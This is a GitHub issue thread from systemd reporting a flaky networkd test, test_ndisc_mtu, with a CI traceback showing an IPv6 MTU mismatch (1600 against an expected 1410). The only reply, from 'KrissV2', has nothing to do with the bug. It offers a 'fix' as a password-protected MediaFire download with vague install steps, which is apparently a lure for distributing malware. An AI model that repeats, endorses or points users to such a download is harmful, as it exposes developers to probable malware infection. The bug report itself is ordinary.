### ISSUE TITLE
test-network: test_ndisc_mtu is flaky

### ISSUE THREAD

**Issue by yuwata** [systemd/systemd#34204]
https://jenkins-systemd.apps.ocp.cloud.ci.centos.org/job/upstream-vagrant-archlinux-sanitizers/16690/artifact/systemd-centos-ci/artifacts_all/artifacts_rkfveou8/vagrant-logs.mIZ/vagrant-arch-sanitizers-clang-testsuite.4sy/systemd-networkd-tests.py_FAIL.log
```
======================================================================
FAIL: test_ndisc_mtu (__main__.NetworkdRATests.test_ndisc_mtu)
----------------------------------------------------------------------
Traceback (most recent call last):
  File "/build/test/test-network/systemd-networkd-tests.py", line 5737, in test_ndisc_mtu
    self.check_ndisc_mtu(1410)
  File "/build/test/test-network/systemd-networkd-tests.py", line 5716, in check_ndisc_mtu
    self.fail(f'IPv6 MTU does not matches: value={output}, expected={mtu}')
AssertionError: IPv6 MTU does not matches: value=1600, expected=1410

----------------------------------------------------------------------
```

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
